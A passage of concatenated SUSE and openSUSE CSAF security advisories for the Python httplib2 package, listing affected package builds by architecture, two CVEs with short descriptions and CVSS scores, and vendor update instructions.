"python2-httplib2-0.19.0-bp152.3.3.1.noarch", product_id: "python2-httplib2-0.19.0-bp152.3.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Package Hub 15 SP2", product: { name: "SUSE Package Hub 15 SP2", product_id: "SUSE Package Hub 15 SP2", }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-bp152.3.3.1.noarch as component of SUSE Package Hub 15 SP2", product_id: "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-bp152.3.3.1.noarch", relates_to_product_reference: "SUSE Package Hub 15 SP2", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-26T12:05:23Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Package Hub 15 SP2:python2-httplib2-0.19.0-bp152.3.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-26T12:05:23Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
opensuse-su-2024:14141-1
Vulnerability from csaf_opensuse
Published
2024-07-12 00:00
Modified
2024-07-12 00:00
Summary
python310-httplib2-0.22.0-4.5 on GA media
Notes
Title of the patch
python310-httplib2-0.22.0-4.5 on GA media
Description of the patch
These are all security issues fixed in the python310-httplib2-0.22.0-4.5 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2024-14141
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "python310-httplib2-0.22.0-4.5 on GA media", title: "Title of the patch", }, { category: "description", text: "These are all security issues fixed in the python310-httplib2-0.22.0-4.5 package on the GA media of openSUSE Tumbleweed.", title: "Description of the patch", }, { category: "details", text: "openSUSE-Tumbleweed-2024-14141", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14141-1.json", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "python310-httplib2-0.22.0-4.5 on GA media", tracking: { current_release_date: "2024-07-12T00:00:00Z", generator: { date: "2024-07-12T00:00:00Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2024:14141-1", initial_release_date: "2024-07-12T00:00:00Z", revision_history: [ { date: "2024-07-12T00:00:00Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python310-httplib2-0.22.0-4.5.aarch64", product: { name: "python310-httplib2-0.22.0-4.5.aarch64", product_id: "python310-httplib2-0.22.0-4.5.aarch64", }, }, { category: "product_version", name: "python311-httplib2-0.22.0-4.5.aarch64", product: { name: "python311-httplib2-0.22.0-4.5.aarch64", product_id: "python311-httplib2-0.22.0-4.5.aarch64", }, }, { category: "product_version", name: "python312-httplib2-0.22.0-4.5.aarch64", product: { name: "python312-httplib2-0.22.0-4.5.aarch64", product_id: "python312-httplib2-0.22.0-4.5.aarch64", }, }, ], category: "architecture", name: "aarch64", }, { branches: [ { category: "product_version", name: "python310-httplib2-0.22.0-4.5.ppc64le", product: { name: "python310-httplib2-0.22.0-4.5.ppc64le", product_id: "python310-httplib2-0.22.0-4.5.ppc64le", }, }, { category: "product_version", name: "python311-httplib2-0.22.0-4.5.ppc64le", product: { name: "python311-httplib2-0.22.0-4.5.ppc64le", product_id: "python311-httplib2-0.22.0-4.5.ppc64le", }, }, { category: "product_version", name: "python312-httplib2-0.22.0-4.5.ppc64le", product: { name: "python312-httplib2-0.22.0-4.5.ppc64le", product_id: "python312-httplib2-0.22.0-4.5.ppc64le", }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "python310-httplib2-0.22.0-4.5.s390x", product: { name: "python310-httplib2-0.22.0-4.5.s390x", product_id: "python310-httplib2-0.22.0-4.5.s390x", }, }, { category: "product_version", name: "python311-httplib2-0.22.0-4.5.s390x", product: { name: "python311-httplib2-0.22.0-4.5.s390x", product_id: "python311-httplib2-0.22.0-4.5.s390x", }, }, { category: "product_version", name: "python312-httplib2-0.22.0-4.5.s390x", product: { name: "python312-httplib2-0.22.0-4.5.s390x", product_id: "python312-httplib2-0.22.0-4.5.s390x", }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "python310-httplib2-0.22.0-4.5.x86_64", product: { name: "python310-httplib2-0.22.0-4.5.x86_64", product_id: "python310-httplib2-0.22.0-4.5.x86_64", }, }, { category: "product_version", name: "python311-httplib2-0.22.0-4.5.x86_64", product: { name: "python311-httplib2-0.22.0-4.5.x86_64", product_id: "python311-httplib2-0.22.0-4.5.x86_64", }, }, { category: "product_version", name: "python312-httplib2-0.22.0-4.5.x86_64", product: { name: "python312-httplib2-0.22.0-4.5.x86_64", product_id: "python312-httplib2-0.22.0-4.5.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "openSUSE Tumbleweed", product: { name: "openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed", product_identification_helper: { cpe: "cpe:/o:opensuse:tumbleweed", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python310-httplib2-0.22.0-4.5.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", }, product_reference: "python310-httplib2-0.22.0-4.5.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python310-httplib2-0.22.0-4.5.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", }, product_reference: "python310-httplib2-0.22.0-4.5.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python310-httplib2-0.22.0-4.5.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", }, product_reference: "python310-httplib2-0.22.0-4.5.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python310-httplib2-0.22.0-4.5.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", }, product_reference: "python310-httplib2-0.22.0-4.5.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python311-httplib2-0.22.0-4.5.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", }, product_reference: "python311-httplib2-0.22.0-4.5.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python311-httplib2-0.22.0-4.5.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", }, product_reference: "python311-httplib2-0.22.0-4.5.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python311-httplib2-0.22.0-4.5.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", }, product_reference: "python311-httplib2-0.22.0-4.5.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python311-httplib2-0.22.0-4.5.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", }, product_reference: "python311-httplib2-0.22.0-4.5.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python312-httplib2-0.22.0-4.5.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", }, product_reference: "python312-httplib2-0.22.0-4.5.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python312-httplib2-0.22.0-4.5.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", }, product_reference: "python312-httplib2-0.22.0-4.5.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python312-httplib2-0.22.0-4.5.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", }, product_reference: "python312-httplib2-0.22.0-4.5.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python312-httplib2-0.22.0-4.5.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", }, product_reference: "python312-httplib2-0.22.0-4.5.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-07-12T00:00:00Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python310-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python311-httplib2-0.22.0-4.5.x86_64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.aarch64", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.ppc64le", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.s390x", "openSUSE Tumbleweed:python312-httplib2-0.22.0-4.5.x86_64", ], }, ], threats: [ { category: "impact", date: "2024-07-12T00:00:00Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
opensuse-su-2024:11231-1
Vulnerability from csaf_opensuse
Published
2024-06-15 00:00
Modified
2024-06-15 00:00
Summary
python36-httplib2-0.19.1-1.2 on GA media
Notes
Title of the patch
python36-httplib2-0.19.1-1.2 on GA media
Description of the patch
These are all security issues fixed in the python36-httplib2-0.19.1-1.2 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2024-11231
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "python36-httplib2-0.19.1-1.2 on GA media", title: "Title of the patch", }, { category: "description", text: "These are all security issues fixed in the python36-httplib2-0.19.1-1.2 package on the GA media of openSUSE Tumbleweed.", title: "Description of the patch", }, { category: "details", text: "openSUSE-Tumbleweed-2024-11231", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_11231-1.json", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "python36-httplib2-0.19.1-1.2 on GA media", tracking: { current_release_date: "2024-06-15T00:00:00Z", generator: { date: "2024-06-15T00:00:00Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2024:11231-1", initial_release_date: "2024-06-15T00:00:00Z", revision_history: [ { date: "2024-06-15T00:00:00Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python36-httplib2-0.19.1-1.2.aarch64", product: { name: "python36-httplib2-0.19.1-1.2.aarch64", product_id: "python36-httplib2-0.19.1-1.2.aarch64", }, }, { category: "product_version", name: "python38-httplib2-0.19.1-1.2.aarch64", product: { name: "python38-httplib2-0.19.1-1.2.aarch64", product_id: "python38-httplib2-0.19.1-1.2.aarch64", }, }, { category: "product_version", name: "python39-httplib2-0.19.1-1.2.aarch64", product: { name: "python39-httplib2-0.19.1-1.2.aarch64", product_id: "python39-httplib2-0.19.1-1.2.aarch64", }, }, ], category: "architecture", name: "aarch64", }, { branches: [ { category: "product_version", name: "python36-httplib2-0.19.1-1.2.ppc64le", product: { name: "python36-httplib2-0.19.1-1.2.ppc64le", product_id: "python36-httplib2-0.19.1-1.2.ppc64le", }, }, { category: "product_version", name: "python38-httplib2-0.19.1-1.2.ppc64le", product: { name: "python38-httplib2-0.19.1-1.2.ppc64le", product_id: "python38-httplib2-0.19.1-1.2.ppc64le", }, }, { category: "product_version", name: "python39-httplib2-0.19.1-1.2.ppc64le", product: { name: "python39-httplib2-0.19.1-1.2.ppc64le", product_id: "python39-httplib2-0.19.1-1.2.ppc64le", }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "python36-httplib2-0.19.1-1.2.s390x", product: { name: "python36-httplib2-0.19.1-1.2.s390x", product_id: "python36-httplib2-0.19.1-1.2.s390x", }, }, { category: "product_version", name: "python38-httplib2-0.19.1-1.2.s390x", product: { name: "python38-httplib2-0.19.1-1.2.s390x", product_id: "python38-httplib2-0.19.1-1.2.s390x", }, }, { category: "product_version", name: "python39-httplib2-0.19.1-1.2.s390x", product: { name: "python39-httplib2-0.19.1-1.2.s390x", product_id: "python39-httplib2-0.19.1-1.2.s390x", }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "python36-httplib2-0.19.1-1.2.x86_64", product: { name: "python36-httplib2-0.19.1-1.2.x86_64", product_id: "python36-httplib2-0.19.1-1.2.x86_64", }, }, { category: "product_version", name: "python38-httplib2-0.19.1-1.2.x86_64", product: { name: "python38-httplib2-0.19.1-1.2.x86_64", product_id: "python38-httplib2-0.19.1-1.2.x86_64", }, }, { category: "product_version", name: "python39-httplib2-0.19.1-1.2.x86_64", product: { name: "python39-httplib2-0.19.1-1.2.x86_64", product_id: "python39-httplib2-0.19.1-1.2.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "openSUSE Tumbleweed", product: { name: "openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed", product_identification_helper: { cpe: "cpe:/o:opensuse:tumbleweed", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python36-httplib2-0.19.1-1.2.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", }, product_reference: "python36-httplib2-0.19.1-1.2.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python36-httplib2-0.19.1-1.2.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", }, product_reference: "python36-httplib2-0.19.1-1.2.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python36-httplib2-0.19.1-1.2.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", }, product_reference: "python36-httplib2-0.19.1-1.2.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python36-httplib2-0.19.1-1.2.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.x86_64", }, product_reference: "python36-httplib2-0.19.1-1.2.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-httplib2-0.19.1-1.2.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.aarch64", }, product_reference: "python38-httplib2-0.19.1-1.2.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-httplib2-0.19.1-1.2.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.ppc64le", }, product_reference: "python38-httplib2-0.19.1-1.2.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-httplib2-0.19.1-1.2.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.s390x", }, product_reference: "python38-httplib2-0.19.1-1.2.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python38-httplib2-0.19.1-1.2.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python38-httplib2-0.19.1-1.2.x86_64", }, product_reference: "python38-httplib2-0.19.1-1.2.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-httplib2-0.19.1-1.2.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.aarch64", }, product_reference: "python39-httplib2-0.19.1-1.2.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-httplib2-0.19.1-1.2.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.ppc64le", }, product_reference: "python39-httplib2-0.19.1-1.2.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-httplib2-0.19.1-1.2.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.s390x", }, product_reference: "python39-httplib2-0.19.1-1.2.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "python39-httplib2-0.19.1-1.2.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:python39-httplib2-0.19.1-1.2.x86_64", }, product_reference: "python39-httplib2-0.19.1-1.2.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.aarch64", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.ppc64le", "openSUSE Tumbleweed:python36-httplib2-0.19.1-1.2.s390x", "openSUSE 